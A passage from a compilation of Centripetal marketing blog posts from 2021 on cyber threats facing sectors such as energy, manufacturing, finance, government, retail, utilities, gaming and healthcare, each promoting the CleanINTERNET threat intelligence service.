targeted seven US pipeline operators, impacting multiple third-party electronic communication systems in the process. Energy companies also often acquire information, hardware, software, and a multitude of services from third-party vendors worldwide, making it difficult to establish a consistent and centralized cybersecurity framework. And any cyber breach is a direct attack on business continuity, with 76% of energy executives citing that business interruption, including loss of revenue, legal implications, and reputational damage, would be the most impactful consequence of a cyber breach for their organization. Reducing cyber risk in the energy sector With the US government earmarking around $3.5 billion for improving the cybersecurity of the electric grid in 2021, it’s clear that cybersecurity within the industry is a major Federal concern. For digitalized, decentralized infrastructure like the energy sector, cybersecurity solutions must be proactive, offering trusted threat visibility and cyber resilience. Our centralized cyber threat intelligence solution, CleanINTERNET, simplifies cybersecurity within energy organizations of all sizes. CleanINTERNET aggregates over 3,500 cyber threat intelligence feeds, shielding ‘all risk’ threats automatically and providing constant threat hunting on behalf of your business. As an extension of your security team, our cyber threat analysts improve visibility over potential breaches, allowing the energy sector to focus on critical business efforts, compliance, and the transition to renewable sources, without the added burden of threat hunting and cyber security. Speak to the Centripetal Sales team today for more information on the CleanINTERNET solution and its role in the energy sector. --- ### [Cybersecurity for Manufacturers in the Era of Industry 4.0](https://www.centripetal.ai/blog/cybersecurity-for-manufacturers) Published: 2021-08-17 Summary: Despite 91% of manufacturers investing in digital technology, 35% have said that they are inhibited from fully investing due to cybersecurity concerns. Manufacturing isn’t a new industry, but it’s an ever-evolving one. The transformation of the industry by IoT, IIoT, OT, SCADA devices, and other data-related technologies is so significant that it’s been called the fourth industrial revolution – or Industry 4.0. However, despite 91% of manufacturers investing in digital technology, 35% have said that they are inhibited from fully investing due to cybersecurity concerns. Threats like ransomware have increased 156% within the industry between 2019 and 2020 and global cybersecurity incidents like WannaCry and LockerGaga have hit manufacturers hard, shutting down facilities, corrupting systems, and putting organizations at huge reputational and financial risk. Smart Factories and their challenges Within Smart Factories, automated industrial internet of things (IIoT) devices communicate and transmit data across multiple systems in real-time. This seamless flow of information is used to adjust and optimize performance, automate the production line to decrease downtime, and ultimately improve productivity and profitability. But as manufacturing systems and Smart Factories become more automated and data-driven, attack surfaces grow. 48% of manufacturers surveyed identified operational risks –which include cybersecurity – as the greatest danger of smart factory initiatives. Without robust cybersecurity measures, every IoT device becomes a potential backdoor to sensitive information. If one device within a network is unsecured, a hacker may be able to access and disrupt the database, causing disturbances in production and financial damage. When US pharmaceutical manufacturer Merck was infected by the NotPetya cyberattack, the organization suffered a loss of over $135 million in sales and $175 million in additional costs. A similar attack could be crippling to a smaller company. Supply chain complexity Industry 4.0 technologies have prompted an evolution in manufacturing supply chains, with devices now able to communicate via digital supply networks (DSNs). DSNs are more dynamic and flexible, made possible by open data sharing from all participants. But this can create access points to other internal information, introducing new attack vectors for malicious actors to exploit, and compromising all levels of the supply chain. The complexity of global manufacturing supply chains also complicates cybersecurity compliance. On top of a huge number of product safety, machinery, and technical regulations, manufacturers must consider cybersecurity standards such as the ISO27001 series, the GDPR, and ISA/IEC 62443 Standards. And global manufacturers with longer supply chains need to adhere to different standards for every partner they work with and each region their supply chain spans, making compliance a cumbersome issue. Despite 89% of manufacturing sector respondents understanding the importance of data standards, only 11% actually invest in implementing them. Building expertise As the complexity and frequency of attacks continue to increase and the cybersecurity skills gap widens, it’s difficult to find and hire the talent needed to design and implement threat detection and mitigation solutions. Manufacturing staff involved in deployment usually specialize in either IT or OT security, while Industry 4.0 requires expertise in several areas, such as overall network security and embedded systems. 12% of manufacturers surveyed said they had no technical or managerial measures to assess or mitigate a cyberattack, and without an official response strategy, organizations are risking their revenue and their reputation should a breach occur. Protecting customer, client, and partner data within a manufacturing organization requires a personalized response strategy, real-time monitoring, and streamlined threat intelligence. Our solution, CleanINTERNET, identifies real known threats by monitoring incoming and outgoing traffic in real-time, and provides bi-directional mass-shielding to prevent network infiltration and data exfiltration. We offer the manufacturing sector instant visibility across large, decentralized networks in a way that is effortless to implement and maintain. Centripetal CleanINTERNET utilizes a growing base of over 3,500 cyber threat intelligence feeds, using dynamic cyber threat intelligence to identify what’s relevant for your business. Our cyber threat analysts act as an extension of your team, delivering personalized findings and shielding recommendations straight to you, and alleviating the burden on your security team. CleanINTERNET also helps mitigate risk from failure to meet compliance standards such as PCI DSS, ITAR, HIPAA, and more. The Centripetal team provides personalized support from day one, working with you from implementation onwards to simplify cyber threat intelligence and allowing you to focus on growing and running your business without the concern of cyber threats. Get in touch with our team for more information on cyber threat intelligence for the manufacturing industry. Stay tuned for our next blog on evolving cybersecurity threats within the energy sector. --- ### [Beyond Firewall Security](https://www.centripetal.ai/blog/beyond-firewall-security) Published: 2021-08-05 Summary: Firewall security has its limitations. It’s not uncommon for firewalls to fail, with mistakes often made in patching or configuration that can allow serious threats through. How Centripetal Enhances Network Protection Many in the cyber security field feel that they are protected since they have firewalls in place. The reality is that firewall security has its limitations. It’s not uncommon for firewalls to fail, with mistakes often made in patching or configuration that can allow serious threats through. When Firewall Security Fails Firewalls form an essential layer of best practice cybersecurity — protecting networks by blocking unwanted or suspicious traffic. But the threat landscape is a dynamic and volatile place. Cyber-criminals are constantly hunting for gaps in corporate defenses that they can exploit to sneak through into networks. There’s plenty to lose if threat actors find any of these gaps in your firewalls. Alongside misconfigured access control settings, software vulnerabilities represent a major risk. A serious bug in the firewall software could allow malicious traffic right through the cyber-front door and into the corporate network, if exploited by cyber-criminals. How Centripetal Can Help With Centripetal, you’re preventing known malicious sources from entering the network before the security stack, dramatically increasing the security posture and helping safeguard common firewall issues. More specifically, our: CleanINTERNET Service combines over 3,500 cyber threat intelligence feeds to offer comprehensive network protection from malicious activity CleanINTERNET helps prevent network infiltration and data exfiltration with bi-directional shielding of known malicious threats. CleanINTERNET also provides an elite team of threat analyst team to act as an extension of your own security team. Centripetal also offers Professional Services to assist with various cyber security services if needed. Find out more To find out more on how Centripetal’s zero-trust intelligence-based defense can help block the threats firewalls may miss, please read our white paper here. --- ### [Protecting Hospitality From Cybersecurity Threats](https://www.centripetal.ai/blog/hospitality-cybersecurity-protection) Published: 2021-07-27 Summary: An explosion of data has made the hospitality industry easy prey for hackers, with 22 million U.S travellers reported as being a victim of a cybersecurity attack at hotels. No industry has undergone such a dramatic evolution in recent years as the hospitality industry. To keep up with customer demand for convenience and accommodate COVID-19 restrictions, many hospitality businesses have digitized dramatically, implementing reservation apps, digital payments, and online loyalty programs. This explosion of data has made the hospitality sector easy prey for hackers, with 22 million U.S travellers reported as being a victim of a cybersecurity attack at hotels. Easy prey for hackers The interconnected digital environments within hotels and holiday resorts are a particularly weak spot, all containing card-reading and POS devices and storing customer data long after guests have left. With individual hotels, resorts, and restaurants often connected to the organization’s national or international network, only one location needs to be breached before the entire company is at risk. Malicious actors can also gain access to personal data from smart televisions, biometric keys, and hotel WiFi in spear phishing attacks like DarkHotel. These breaches cost not only business revenue for recovery and fines, but also risk customer trust and reputation within the industry. Supply chain risk The hospitality industry also relies heavily on third parties including reservation platforms, food suppliers, and POS system vendors, all of which can bring their own vulnerabilities. Supply chain incidents, like the 2019 French booking firm breach that impacted 600,000 hotels worldwide, are likely to increase as more companies move their data to cloud and SaaS platforms. A lack of internal resources Networks within hospitality businesses are in constant use from countless hosts. Many employees who interface with computers in hotels, restaurants, and resorts do not have extensive cybersecurity training or an IT department on hand, so may not be able to spot cybersecurity threats or know how to act on them. With no internal IT team, small and midsized hospitality businesses are challenged with managing compliance efforts for regulations such as the CCPA and GDPR, the latter of which Marriott was fined $23.9 million for breaching in 2020. In-depth threat visibility for hospitality To better their cybersecurity posture, hospitality organizations need in-depth threat visibility and automated compliance features that can be managed efficiently by busy staff. A proactive strategy that includes real-time threat detection is vital, particularly considering it takes an average of 195 days for businesses in the hospitality sector to detect a breach. At Centripetal, we developed CleanINTERNET to provide in-depth, proactive threat intelligence that can bolster cybersecurity posture for hospitality organizations of all sizes, from large franchises to smaller companies. CleanINTERNET aggregates over 3,500 cyber threat feeds for you, analyzing and shielding threats on your behalf and delivering comprehensive, relevant findings to you through our team of expert threat analysts. This alleviates the burden on your existing security team, letting staff focus on your customers and mission-critical business operations. CleanINTERNET saves millions of dollars on separate cyber threat intelligence feeds, helping to mitigate the risk of non-compliance and better positioning hospitality organizations to maintain effective cybersecurity. Speak to our team about mitigating cyber risks in the hospitality sector and mitigating threats with CleanINTERNET. --- ### [Mitigating Financial Services’ Data Breaches](https://www.centripetal.ai/blog/financial-services-data-breaches) Published: 2021-07-14 Summary: Data Breaches targeting financial services can quickly spread through entire systems, impacting individuals, companies, and the economy as a whole. Financial services such as banks, credit card companies, and insurance providers are trusted with an abundance of sensitive data, including customer’s Social Security numbers, banking details, and personal information. As a result, banking and financial institutes are 300 times more at risk of cyberattack than other companies. Data Breaches targeting financial services can quickly spread through entire systems, impacting not only individuals and their confidence in organizations, but also companies, investors, and the economy as a whole. Decentralized & Digitized Financial services are now also highly dependent on computer systems, internet banking, and mobile apps. A study in 2019 discovered 91% of mobile banking apps were found to contain at least one medium-risk security vulnerability. And with the COVID-19 pandemic acting as a catalyst for organizations to onboard their business digitally, attack vectors and new vulnerabilities were introduced and increased. Financial services’ infrastructure also often rests on multiple, decentralized systems, making it a lucrative target for cybercriminals, with the remote working boom exacerbating the decentralization of networks. A rise in social engineering In 2020, no other sector had as many DDoS attacks as financial services, due in part to the COVID-19 pandemic driving an increase in online transactions. Now a huge 28.9% of global phishing targets financial institutions and their customers. Advanced Persistent Threats (APTs) are another serious threat, often targeting banking systems and financial firms due to the sensitive nature of their data. APTs are typically carried out by stealthy threat actors looking to gain access to applications and steal financial data. In 2014, Carbanak, an APT-style campaign, was discovered to have stolen between $800 million and $1 billion from banks around the world. As in any industry, financial organizations are also struggling to find and recruit the professionals they need to improve their resilience in the face of social engineering attacks. 81% of the financial services sector report a shortage of cybersecurity skills in their organizations, and 74% believe that the talent shortfall makes organizations more vulnerable to attackers. Staying ahead with threat intelligence Organizations in the financial services industry need to utilize automated, proactive cybersecurity solutions that combat the shortage of cybersecurity professionals and ease the burden on existing staff. They also require a cybersecurity strategy that offers threat visibility across decentralized, distributed systems so that they can quickly detect and prevent attacks and protect their customers, their data, their networks, and their reputation. Centripetal’s CleanINTERNET service, provides dynamic, proactive threat intelligence that increases cybersecurity posture while alleviating the burden of the skills gap. CleanINTERNET aggregates over 3,500 cyber threat feeds for you, performing in-depth threat analysis and shielding on your behalf. Our team of expert cyber threat analysts deliver comprehensive, relevant threat findings to your team directly, giving you visibility of cyber threats across distributed systems and alleviating the threat hunting burden for your security staff. This makes your existing security tools more viable, saving millions of dollars on separate threat feeds and helping to mitigate the risk of non-compliance. CleanINTERNET’s end-to-end network visibility offers financial service providers immeasurable security and control. Stay tuned for our next blog on tackling cybersecurity threats within the hospitality industry. --- ### [Transforming Local Government Cybersecurity](https://www.centripetal.ai/blog/local-government-cybersecurity) Published: 2021-06-22 Summary: No less of a target than their federal counterparts, local government cybersecurity’s top three issues are budget, talent, and increasing cyber threats. In the wake of last December’s SolarWinds cyber attack, it’s become apparent that the fallout from the hack didn’t just damage the federal government’s cybersecurity defenses, but state and local government’s as well. No less of a target than their federal counterparts, state and local government cybersecurity’s top three issues are budget, talent, and increasing cyber threats. Although the threats they face may differ, both federal and state government share a need for additional threat intelligence sharing and a solution to the cyber skills shortage. The state of local government cybersecurity Since 2017, attacks on state and local governments have risen by almost 50% with average ransomware demands inflating from $30,000 to nearly half a million dollars. Because of their smaller size and their need to stay operational, state and local governments have become a favored target for threat actors – particularly ransomware operators – as smaller agencies are more likely to pay to recover from an attack. Even organizations that pledge not to pay ransoms often spend more on recovery than the attackers originally demanded; The city of Baltimore spent nearly $18 million recovering from an infection after refusing a $78,000 ransom, and a ransomware attack cost the New Orleans city government $7 million in 2020. The global cybersecurity skills gap has led to a shortfall of 3.12 million cyber professionals, with state and local governments lacking “the right tools and people […] compared to federal” for managing cybersecurity risk, according to a Ponemon report. Additionally, as many government employees continue to work from home after the COVID-19 pandemic, remote workers have created a broader attack surface, and the steady adoption of cloud-based technology has likely weakened security further with the addition of yet more tools to secure. These tools are an unwelcome added cost for smaller government organizations, who tend to have smaller budgets than larger government agencies. Federal v State Compared to larger, federal-level government agencies, more state and local organizations describe their cybersecurity programs as being in the early and middle stages of maturity, and state government security professionals also ranked their ability to prevent, detect, contain, and recover from a cyber attack lower than federal professionals did. Improving state and local government cybersecurity means making improvements to cyber threat detection and prevention. Federal agencies have been found to have a stronger cybersecurity posture than state agencies, as federal agencies rely more on intelligence sharing. Only 29% of federal respondents and 21% of state and local respondents feel that their organization’s collection and use of actionable intelligence is effective in predicting cyber threats. However, state and local government organizations have great opportunities for innovation, with workers in local government “more positive about their ability to innovate” than their federal peers, due to the flexible and autonomous nature of smaller governments. Utilizing threat intelligence After working on secure communications systems for the Department of Defense, Centripetal’s CEO Steven Rogers used his experience in government security to develop CleanINTERNET, a solution that aggregates over 3,500 cyber threat intelligence feeds, shielding ‘all risk’ threats automatically and delivering personalized threat intelligence insights to you and your team. By offering constant threat hunting on your behalf, we act as an extension of the cybersecurity team, alleviating the burden on smaller teams and bridging the cybersecurity skills gap, making existing security tools more viable. CleanINTERNET saves millions of dollars on separate cyber threat intelligence feeds, helping to mitigate the risk of non-compliance and making us one of the best solutions for state and government cybersecurity. For more information about global government cybersecurity, check out our previous blogs on global governments and federal governments. --- ### [The Key Challenges for Federal Government Cybersecurity](https://www.centripetal.ai/blog/federal-government-cybersecurity-challenges) Published: 2021-06-15 Summary: The federal government has demonstrated an ongoing commitment to its cybersecurity posture, allocating $18b for cyber spending in 2021 alone. The federal government has demonstrated an ongoing commitment to its cybersecurity posture, allocating an estimated $18.78 billion for cybersecurity spending in 2021. But the decentralized nature of the U.S. government means that federal government cybersecurity efforts have to span more than 100 different agencies. What’s more, the growing cybersecurity skills gap has left the government with a lack of skilled professionals, challenged with keeping up with cyber threats that are constantly increasing in frequency and complexity. In the wake of a major U.S government data breach in 2020, it’s clear that the federal government needs better visibility over cyber threats. At the federal government level, data is scattered across multiple departments, agencies, and contractors. In addition to its decentralized nature, governments are increasingly allowing users to work remotely – particularly following the COVID-19 pandemic – triggering a huge growth in endpoints that need to be secured. With over 300,000 Department of Defense contractors now affected by the CMMC framework, regulatory compliance across vast government systems is also a major challenge. As well as the need for more efficient coordination and protection within dispersed networks, Harvard’s ‘Understanding Federal Cybersecurity’ report identified a significant “shortage in skilled cybersecurity-minded talent” within the federal government, with many government cybersecurity specialists leaving their jobs in favor of private sector roles. This cybersecurity skills gap – which affects industries of all sizes – limits cyber recruitment, training, and intelligence sharing within the government. A 2020 study found that over half of state and federal security professionals said that cybersecurity practices are not clearly defined, and the majority agreed that the effectiveness in preventing and detecting cyberattacks is low. In 2019, the U.S government accounted for 5.6% of data breaches and 2.1% of all exposed records, making cybersecurity one of their biggest concerns. Advanced cybersecurity technology has been on the market for years, yet the U.S government often opts to focus resources on detection rather than defense. Despite this, the federal government’s detection technology, Einstein, failed to detect a major U.S government cyberattack in 2020, leading to data breaches targeting SolarWinds, Microsoft, VMware, and a number of other firms. The sophisticated nature of this attack demonstrated that nation-state actors, criminal organizations, and hacktivists with the resources to continually attempt and improve intrusion methods will likely succeed. In 2021, White House leaders called for a comprehensive cybersecurity overhaul to better protect critical infrastructure and data in response to the SolarWinds attack. To maintain a comprehensive cybersecurity strategy, government agencies need total visibility and control and a validated, zero-trust architecture that does not overwhelm and distract employees from mission-critical government operations. To achieve this, quality threat intelligence is a necessity: only 29% of federal workers and 21% of state and local workers feel that their organization’s collection and use of actionable intelligence from other sources are effective in predicting malicious activities. At Centripetal, we know how vital cyber threat intelligence is in shielding the federal government against escalating attacks. Our founder Steven Rogers’s experience working within the Department of Defense led him to develop CleanINTERNET, a solution that aggregates over 3,500 cyber threat intelligence feeds, shielding ‘all risk’ threats automatically and providing constant threat hunting on your behalf. This enhances overall threat visibility, saving millions of dollars on purchasing separate threat feeds and helping to mitigate the risk of non-compliance. By acting as an extension of our customers’ security teams, we bridge the cybersecurity skills gap and ease the burden on security professionals, enabling dynamic, effortless cyber threat intelligence for government bodies of all sizes. For more information about global government cybersecurity, check out our previous blog. Our next blog will focus on state and local governments, continuing the conversation on cyberattacks and defense in government. --- ### [Preventing Ransomware with Intelligence](https://www.centripetal.ai/blog/cleaninternet-preventing-ransomware) Published: 2021-06-11 Summary: Centripetal’s massive library of CTI actively prevented IOC's by containing them for months before the ransomware attacks occurred. Recently several high-profile ransomware incidents have affected the country, these include Colonial Pipeline, JBS, and FujiFilm. These attacks do not occur in a vacuum and use known Indicators of Compromise (IOCs) previously published in Cyber Threat Intelligence (CTI). Centripetal’s massive library of CTI contained these indicators for months before the ransomware attacks occurred and can be actively prevented. Previously Known Indicators Analyzing the IOCs from the Colonial Pipeline attack shows that the indicators for Darkside ransomware were known since early January of 2021 across 53 separate CleanINTERNET intelligence feeds before the attack was launched. Similarly, the JBS and FujiFilm attacks from the REvil/Sodinokibi ransomware had IOCs published in CTI since January 13th, 2021 across 65 CleanINTERNET intelligence feeds. The intelligence was published by providers including Recorded Future, Proofpoint Emerging Threats, IBM X-Force, ZETAlytics, and more. The intelligence was known beforehand and malicious actors can be stopped in their tracks. Proactive Defense with Applied Intelligence Centripetal actively defends networks by utilizing CTI in a proactive manner. CleanINTERNET uses a custom-built Threat Intelligence Gateway to automatically block malicious indicators as they are published in CTI. --- ### [Mitigating Cyber Attacks in Global Governments](https://www.centripetal.ai/blog/cyber-attacks-global-governments) Published: 2021-05-26 Summary: With geopolitical tensions escalating, cyber attacks are on global governments are increasing, accounting for 13% of all ransomware attacks. Cyber attacks from nation-state actors, terrorist groups, criminal organizations, and hacktivists have been a growing concern for years. The increase in attack frequency, threat complexity, and the seriousness of national security and the economic implications have made cyber attacks one of the biggest threats to nations and their governments. The U.S government allocated around $18 billion for cybersecurity spending in 2021, however with the COVID-19 pandemic escalating geopolitical and economic tensions, cyber attacks are increasing. In fact, global government organizations account for 13% of all ransomware attacks. Government information has become extremely precious to the right people. Where traditional hacking looks to steal credit card details or personal information, government hackers are looking for more substantial information like government intelligence or military plans. Because this data is so valuable, the hackers targeting global governments have infinite time, money, resources, and use the latest technologies. It’s their full-time job to make sure they’re constantly looking for cyber breach opportunities. The global pandemic has dramatically increased our dependence on everything digital. And with remote working becoming integral to individuals and businesses, including within government organizations, our reliance on digital technologies is only going to continue. Few government jobs involve sitting at the same desk each day, meaning workers often log in to multiple devices from multiple locations, needing to access confidential files. This digital connectivity enables collaborative and productive working in this fast-paced sector, but networked ecosystems like those within governments open up networks to potential cyber attack. Recent events such as the Russian state-sponsored attack of the U.S federal government in 2020 illustrated that the vulnerabilities of one organization often threaten its clients and partners by moving quickly between public and private networks, particularly in highly connected government ecosystems. Additionally, government staff are often burdened with heavy workloads and don’t have the time to learn cybersecurity best practice or assess and verify log-in attempts when staff numbers are in the thousands, spanning multiple departments and external third parties. Unfortunately, there is no end in sight to the ‘trade wars’ and ongoing tech arms race between the world’s superpowers, raising the stakes of state-sponsored cyber attacks between nations. In the last few months alone, the Chinese government is suspected of hacking U.S election candidates’ private emails, the Norwegian parliament experienced a significant email data breach, and a Russian hacking group launched a phishing attack attempting to disrupt Ukraine’s independence day. With government staff focused on their primary role, cybersecurity is often an afterthought. Global governments need their cybersecurity practices and solutions to be as efficient as possible, fitting into their existing systems seamlessly. To supplement traditional layers within their security stack, governments around the world are starting to prioritize advanced threat intelligence, as seen in the UK’s Cyber Security Information Sharing Partnership. Cyber Threat Intelligence Feeds Centripetal’s CleanINTERNET solution aggregates over 3,500 cyber threat intelligence feeds for your business, shielding ‘all risk’ threats automatically and delivering personalized threat intelligence insights to you and your team. For large organizations such as governments, we act as an extension of the cybersecurity team, alleviating the burden on staff, bridging the cybersecurity skills gap, and making existing security tools more viable. CleanINTERNET saves millions of dollars on separate cyber threat intelligence feeds, offering visibility of cyber threats across distributed systems and making us one of the best solutions for government organizations. Our service is designed to fit any budget and organizations of any size, so get in touch with the Centripetal team to find out more about CleanINTERNET for your business. --- ### [eCommerce and it's impact on Retail Cybersecurity](https://www.centripetal.ai/blog/ecommerce-retail-cybersecurity) Published: 2021-05-12 Summary: The shift to eCommerce was accelerated by five years in 2020 alone, making retail and eCommerce prime targets for cybersecurity hackers. When the COVID-19 pandemic triggered global lockdowns in 2020, eCommerce growth advanced as retailers relied solely on digital sales to stay afloat. In fact, the shift to eCommerce was accelerated by five years in 2020 alone. The Rise of eCommerce This rise of eCommerce has introduced a number of challenges for retailers and their cybersecurity posture. Stores and organizations handle a huge amount of customer data when trading online, including names, phone numbers, personal email addresses, physical addresses, and financial information. The push to further streamline online shopping experiences during the pandemic vastly increased the amount of data making its way through retailers’ networks, therefore creating new points of entry for threat actors to exploit. This makes retail organizations prime targets for hackers looking to access bank details or use data for phishing schemes, identity theft, or to sell on the Dark Web. 24% of all cyberattacks in 2020 targeted retailers, leading to major retail data breaches such as the attack on Barnes & Noble. As the world opens up and consumers begin to shop again, many are realising the benefits and ease of shopping online, and the growth of eCommerce shows no signs of slowing down. Retailers were suffering at the hands of cyberattacks long before the pandemic. Nearly half of the top U.S retailers (43%) have vulnerabilities that pose an immediate cybersecurity risk, and only one third of retail organizations consider their IT security posture to be ‘highly effective’. These increasing risks threaten to damage one of the most valuable aspects of the retail industry – the relationship between consumer and brand. In the face of a cyber attack, 42% of retailers experienced brand degradation, causing irreversible business damage. Strengthening Cybersecurity Posture Retailers and eCommerce businesses are now looking to strengthen their cybersecurity posture, with 57% stating that bolstering retail cybersecurity was among their top three short-term business goals. One of the ways they can best invest in cybersecurity and boost organizational resilience is with trustworthy threat intelligence. Staying on top of the latest threats leads to improved visibility, a more effective defense, and company-wide security awareness. At Centripetal, we know how overwhelming and time-consuming threat intelligence can be for retail organizations. Our solution, CleanINTERNET, aggregates over 3,500 cyber threat intelligence feeds, shielding ‘all risk’ threats automatically and provides constant threat hunting on your behalf. This greatly improves visibility over potential threats, allowing you to keep up with the threat landscape and ease the burden on your internal security team. Our proactive, dynamic cyber threat intelligence service keeps costs under control, helping to mitigate the risks of non-compliance and reputational damage. CleanINTERNET’s end-to-end network visibility offers retailers complete control over their organization’s digital environments. Get in touch with our team for more information on our cyber threat intelligence service for the retail sector. Stay tuned for our next blog on mitigating cybersecurity risk in global government. --- ### [Cybersecurity Risk in the Utilities Sector](https://www.centripetal.ai/blog/cybersecurity-utilities-sector) Published: 2021-04-26 Summary: As providers of CNI, a cyber breach in the utilities sector could cause millions to lose access to essential services like power and water. The cyber threat landscape for the utilities sector is constantly expanding to include more complex attacks from nation-state actors and other sophisticated players, who have repeatedly demonstrated their willingness to target essential infrastructure providers. In 2019, more than a dozen US utilities operators across 18 states were targeted when adversaries attempted to install malware on their systems via phishing attempts. The following year, in 2020, the FBI put out a warning to the energy sector, informing them of an imminent threat from Russian APT28 group. As providers of critical national infrastructure, a cyber breach in the utilities sector could cause major disruption to transport, banking, and communications, and millions could lose access to essential services like power and water. With digitization further increasing their attack surface, utilities need to understand the risks at hand and how to minimize them. Concerns around cybersecurity continue to be at the top of utilities’ agendas, driven by the interconnected nature of infrastructure and systems, increasing regulations, and the rise in attack frequency and complexity. The need to connect a growing range of citizens to essential utility systems and the growth of private consumer data, collected by utilities through smart metering and smart homes, add additional risk and may complicate the compliance process. By their nature, utilities have to operate a geographically distributed infrastructure; the average top 25 US power company operates across 121 plants with over 94,000 miles of distribution. As utilities’ systems are becoming increasingly connected through sensors and networks, their dispersed nature makes them hard to control. This makes both physical security and cybersecurity challenging, as maintaining visibility across all systems takes considerable time, revenue, and manpower. This is heightened in developing regions and in smaller organizations, where the cost of a robust cybersecurity stack and security team may exceed the revenue made from site operations. The Internet of things (IoT) has become a key enabler in the modernization of utilities’ infrastructure, improving the efficiency of grids, maintenance, asset management, and allowing for better customer service to the end user. However, IoT can expose utilities to a host of new threats and vulnerabilities – 84% of organizations who have IoT deployments have experienced an IoT-related breach, most commonly as a result of malware. In the past, operational technology (OT) such as SCADA, smart substations, and distribution management, all crucial to utilities, were isolated from external systems, making them difficult to attack. However, as operational systems become more digitized and connected, IT and OT have converged, opening up industrial control systems such as SCADA to further cyber risk. Securing hybrid IT/OT systems means observing all incoming and outgoing traffic to block cyber threats, which traditional security stacks, such as firewalls, are unable to do. Additionally, extreme weather and natural disasters mean that utilities are in emergency response mode more often than other sectors. This means their security solutions have to be tested and watertight, but flexible enough to adapt to the modern workplace. The remote working boom introduces new cyber risks as facilities are left undermanned and hackers employ social engineering tactics to attack employees as they work from home. Beyond Reactive Cybersecurity As utility infrastructures become more interconnected, smart, and decentralized, a centralized approach to securing them is no longer sufficient. Organizations must go beyond reactive security and take a forward-looking approach to threat detection and incident response, with cyber resilience and compliance built in. At Centripetal, we understand the risks facing utilities organizations, which is why we developed our cyber threat intelligence solution, CleanINTERNET. CleanINTERNET aggregates, manages, and delivers thousands of cyber threat intelligence feeds directly to you, helping to mitigate the risk of non-compliance and the associated reputational damage. CleanINTERNET’s bi-directional traffic analysis and deep packet inspection quickly give you visibility of cyber threats across distributed systems preventing network infiltration and data exfiltration. By acting as an extension of your security team, we bridge the cybersecurity skills gap for your employees, providing strategic intelligence at a fraction of the cost of multiple, disparate threat feeds. Get in touch with our team to find out more about cyber threat intelligence for the utilities industry. --- ### [Don't Gamble on Your Cybersecurity](https://www.centripetal.ai/blog/cybersecurity-gaming-industry) Published: 2021-04-13 Summary: The sheer scale of the gaming and gambling industry makes it a very attractive target for cybersecurity criminals. The gaming industry was valued at $162 billion in 2020 and is expected to be worth $295 billion by 2026. The sheer scale of the industry makes it a very attractive target for criminals, and technological advancements have only increased cybersecurity threats. Players now have a number of online betting services to choose from and traditional casinos are even investing in gaming applications and mobile-friendly games. Online gambling and gaming is witnessing massive growth in the US, now projected to reach a value of $102.9 billion by 2025, due in part to social restrictions during the coronavirus pandemic. As gambling services digitize, the threats they face are heightened. As well as the traditional chip switching scams, hidden cameras, earpieces, and physical heists on the casino floor, we see a number of complex cyber threats. These include expediting gameplay abuse to offer unfair advantages to cheating players, Distributed Denial of Service (DDoS) attacks, scraping data, account takeover attacks, and Structured Query Language (SQL) injection attacks to steal, add, modify, and delete data according to their will. Many players use digital wallets, and sometimes cryptocurrency like Bitcoin, when gaming and gambling online. If breached, these digital wallets hold a great deal of personal and financial information; when a data leak was discovered by digital wallet app Key Ring in 2020, 14 million users were exposed. If a gaming service is vulnerable, it risks exposing customers’ personal data and payment information to fraudsters, risking not only customer safety but also company revenue and reputation. As an industry built around trust and fairness, a gambling breach can shake the confidence and loyalty of players. Gambling and gaming organizations can be limited by software from gaming manufacturers that might not be up to date, and smaller organizations within the industry may lack the budget and staff to continuously monitor their security environment. This is a particularly prevalent amongst tribal casinos, which may struggle to hire IT teams in rural locations. Additionally, PCI compliance is a challenge when payment cards are accepted both on a casino floor and in its associated hospitality and retail premises. A proactive approach With more services to target and increased attacks types, gaming services, both online and offline, need to be more proactive in securing their platforms. For organizations to protect their customers, their networks, and therefore their brand reputation, they need clear visibility of potential threats and a solution that does not put a strain on their security teams. By leveraging over 3,500 cyber threat intelligence feeds, shielding ‘all risk’ threats automatically, and performing cyber threat hunting on your behalf, CleanINTERNET enables dynamic, effortless cyber threat intelligence for your business. CleanINTERNET saves millions of dollars on separate CTI feeds, delivering comprehensible, relevant threat findings to your team directly, which alleviates the burden of the cybersecurity skills gap and assists in your PCI compliance efforts. Centripetal’s CleanINTERNET solution offers immeasurable security at an affordable price, making us one of the best solutions for the gaming and gambling industry. Speak to our team about mitigating cyber risks in the gaming industry with CleanINTERNET. --- ### [CleanINTERNET for the Healthcare Industry](https://www.centripetal.ai/blog/cleaninternet-healthcare-industry) Published: 2021-03-15 Summary: The healthcare industry has become a prime target for cybercriminals, incurring the highest average data breach costs at $7.13 million. The healthcare industry incurs the highest average data breach costs at a huge $7.13 million, 84% more than the global average. In the wake of high-profile breaches like the SolarWinds attack and the rise of ransomware like Ryuk, healthcare organizations are facing complicated and increasing cyber threats. The industry has become a prime target for cybercriminals, making it vital for their security staff to gain better visibility, stay ahead of the cyber threat curve, and protect their networks. Digital Transformation The complexity of networks in healthcare organizations and the highly prized PII they contain has led to an increase in cyber breaches. Healthcare networks contain Internet, Intranet, IoT, SCADA, and other nodes, making it a challenge to monitor and manage, and cybercriminals know and exploit this. Budgets are stretched, and staff members may not always have the time to complete cybersecurity training, leaving them even more vulnerable to social engineering tactics and attacks like ransomware and phishing emails. Organizations that use BYOD (Bring your Device) also open themselves up to further potential compromises from external, unknown devices entering the network. Additionally, rapid digital transformation within the healthcare industry has caused many organizations to use third-party partners, absorbing networks that aren’t their own which may be unsafe or already compromised. This is particularly important in medical IoT devices that are connected to the network but cannot support security applications. If critical devices like remote patient monitors, connected inhalers, and surgery robotics are compromised, there are increased risks to patients’ health and the integrity of the entire network. When facing these challenges, traditional security stacks, such as firewalls, cannot inspect all outbound traffic attempts or block all IoCs for a network as vast as those in healthcare. Universal Health Services (UHS), a Fortune 500 hospital and healthcare services provider, suffered a Ryuk ransomware attack in September 2020, costing around $67 million in lost income, operational disruption, and remediation expenses. Part of a wave of Ryuk attacks on the US healthcare system towards the end of 2020, the ransomware infiltrated UHS’ systems via phishing emails, causing disruption to clinical and financial operations and forcing facilities to rely on offline documentation. Fortunately, when clients have raised concerns to the Centripetal team about being targeted by Ryuk ransomware, we have been able to identify and protect against potential events in a matter of hours. Dynamic Cyber Threat Intelligence Hospitals and healthcare organizations need to layer their security tools and use dynamic threat intelligence to identify threats to their network. Centripetal CleanINTERNET’s deep packet inspection sits at the edge of the network, identifying real known threats, monitoring incoming and outgoing traffic, and blocking compromised third parties from reaching infrastructure. For healthcare organizations, this means their large, complicated networks can be secured from insider and outsider threats, with CleanINTERNET observing all traffic, including medical IoT devices that connect outwardly, and proactively identifying and blocking cyber threats. When CleanINTERNET is installed, we find that around 1 in 4 